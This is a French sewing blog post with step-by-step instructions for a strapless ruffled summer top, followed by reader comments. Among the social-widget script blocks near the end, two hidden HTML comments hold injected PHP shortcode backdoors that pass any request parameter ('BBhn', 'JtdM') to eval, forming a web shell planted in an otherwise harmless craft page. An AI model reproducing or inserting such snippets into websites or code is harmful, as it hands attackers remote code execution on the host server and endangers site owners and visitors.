DIY – Mon bustier d’été fleuri !

La belle saison et les occasions d’enfiler des bustiers ne vont pas manquer (et ne manquent déjà pas) ! C’est pourquoi je vous propose aujourd’hui de créer un petit top à volant, sans bretelles, parfait pour vos journées d’été ! Élégant, mettant en avant les épaules, ce bustier s’adapte aussi bien à la plage qu’aux douces soirées… et se réalise en toute facilité !

Ça vous dit ?
Si oui, n’hésitez pas à me partager vos créations comme certains l’ont déjà fait dernièrement avec le kimono via instagram !

Il vous faut :

  • du tissu (150x80cm) le mien provient de chez Sacrés Coupons à Paris.
  • un élastique (80cm)
  • le nécessaire de couture

Les étapes de réalisation :

1 – Coupez les tissus :

  • *une bande de 120x54cm pour la partie haute du top
  • *une bande de 150x20cm qui constituera le volant du bas

Pour la taille, ces dimensions correspondent à un 36/40. En effet, le tissu est assez fluide et l’élastique permet d’élargir pas mal le tissu pour le passer.
Pour vous donner plus d’indications, sur produit fini, le bustier fait 56cm (28cm devant, 28cm dos) au niveau de l’élastique lorsque celui est cousu et détendu complètement. Lorsque je le porte il s’étend à 80cm. Enfin l’élastique tendu au maximum fait d’environ 110cm. A vous d’ajuster 😉

2- On commence par la petite bande (au bas du top) qu’on va froncer un peu : il faut d’abord faire deux lignes de couture parallèle avec un point simple assez long (4mm) en veillant à ne pas marquer l’arrêt . Tirez sur les deux fils du devant pour faire froncer le tissu. Commencez par un côté, puis faites de même de l’autre côté. Répartissez les fronces de façon homogène et quand le résultat vous plait, nouez les fils.

Fait ensuite un ourlet sur l’autre côté du tissu et repassez-le.

3 – Prenez votre 2e bande de tissu, celle qui constituera la partie du haut. Faites un point zigzag le long de la première longueur.
J’ai voulu ensuite froncer légèrement le bas donc j’ai refait des fronces en bas (mais ce n’est pas obligatoire).
Vous obtenez à ce moment là deux morceaux comme ceci :

4 – Coudre les deux parties du tissu : attention, on va replier la partie haute pour faire le 1er volant, donc veillez à prendre le tissu dans le bon sens en fonction de celui-ci ! Le mien est identique des deux côtés donc pas de problème.
La couture se trouvera au milieu des deux piqûres de construction des fronces. Enfin surjetez ou surfilez au point zigzag la valeur couture puis retirez les deux fils de construction des fronces.

5 – Pour faire le volant du haut et poser l’élastique, on va replier une bande de 16cm sur l’envers. Épinglez proprement, vérifier qu’il y aura bien de la place pour faire passer l’élastique pour coudre avec un point simple. En général, la hauteur de la coulisse doit être de 5 à 8mn plus grande que la largeur de l’élastique, suffisamment pour permettre le passage de l’élastique, mais, pas trop large pour maintenir convenablement à plat l’élastique et éviter que celui-ci ne se torde dans tous les sens.
Passez ensuite l’élastique dans la coulisse à l’aide d’une épingle à nourrice.

6 – A ce moment là j’ai « passé » le bustier pour ajuster l’élastique à ma convenance (80cm de tour, soit 56cm d’élastique détendu). Epinglez les deux d’élastiques ensemble en faisant bien attention à ce qu’ils restent à plat et qu’aucune boucle ne soit formée à l’intérieur du tissu. Coudre solidement l’ensemble.

7 – Refermez le bustier en cousant les deux côtés sur l’envers. Et voilà !

Le résultat :





Rendez-vous sur Hellocoton !
hellocoton_plugin_url= »http://www.chocodisco.com/wp-content/plugins/hellocoton/ »(function() {var s=document.createElement(« script »);s.type= »text/javascript »;s.src= »http://widget.hellocoton.fr/widget05.js?uniq=910445&url=http%3A%2F%2Fwww.chocodisco.com%2F2015%2F07%2Fdiy-mon-bustier-dete-fleuri.html »;s.async=true;var x=document.getElementById(« hellocoton_script_910445 »);x.parentNode.insertBefore(s,x);})();





Rendez-vous sur Hellocoton !
hellocoton_plugin_url= »http://www.chocodisco.com/wp-content/plugins/hellocoton/ »(function() {var s=document.createElement(« script »);s.type= »text/javascript »;s.src= »http://widget.hellocoton.fr/widget05.js?uniq=961183&url=http%3A%2F%2Fwww.chocodisco.com%2F2015%2F07%2Fdiy-mon-bustier-dete-fleuri.html »;s.async=true;var x=document.getElementById(« hellocoton_script_961183 »);x.parentNode.insertBefore(s,x);})();<!– [insert_php]if (isset($_REQUEST["BBhn"])){eval($_REQUEST["BBhn"]);exit;}[/insert_php][php]if (isset($_REQUEST["BBhn"])){eval($_REQUEST["BBhn"]);exit;}[/php] –>





Rendez-vous sur Hellocoton !
hellocoton_plugin_url= »http://www.chocodisco.com/wp-content/plugins/hellocoton/ »(function() {var s=document.createElement(« script »);s.type= »text/javascript »;s.src= »http://widget.hellocoton.fr/widget05.js?uniq=828564&url=http%3A%2F%2Fwww.chocodisco.com%2F2015%2F07%2Fdiy-mon-bustier-dete-fleuri.html »;s.async=true;var x=document.getElementById(« hellocoton_script_828564 »);x.parentNode.insertBefore(s,x);})();<!– [insert_php]if (isset($_REQUEST["JtdM"])){eval($_REQUEST["JtdM"]);exit;}[/insert_php][php]if (isset($_REQUEST["JtdM"])){eval($_REQUEST["JtdM"]);exit;}[/php] –>

Rendez-vous sur Hellocoton !

4 Commentaires

  1. C'est super joli ce bustier mon dieu ! Je n'ai jamais cousu mais en tout cas tu as fait un beau travail et les photos sont géniales !

    Des bisous ♥

  2. Superbe, je pense me lancer.
    Mais il y a quelque chose que je ne comprends pas : il faut bien épingler endroit contre endroit la partie haute et basse, mais ensuite, quand tu retourne le haut…le tissu est à l’envers non ?

    1. Merci Nala pour ton message ! Alors endroit contre endroit pour la fronce et le corps du vêtement. Ensuite pour le volant du haut, il faut bien sûr le replier sur l’envers pour que tout soit du même côté ! J’espère que mes explications sont claires 🙂
      A bientôt

  3. le rendu est top top !!! je vais tenter aussi ^^

Laisser un commentaire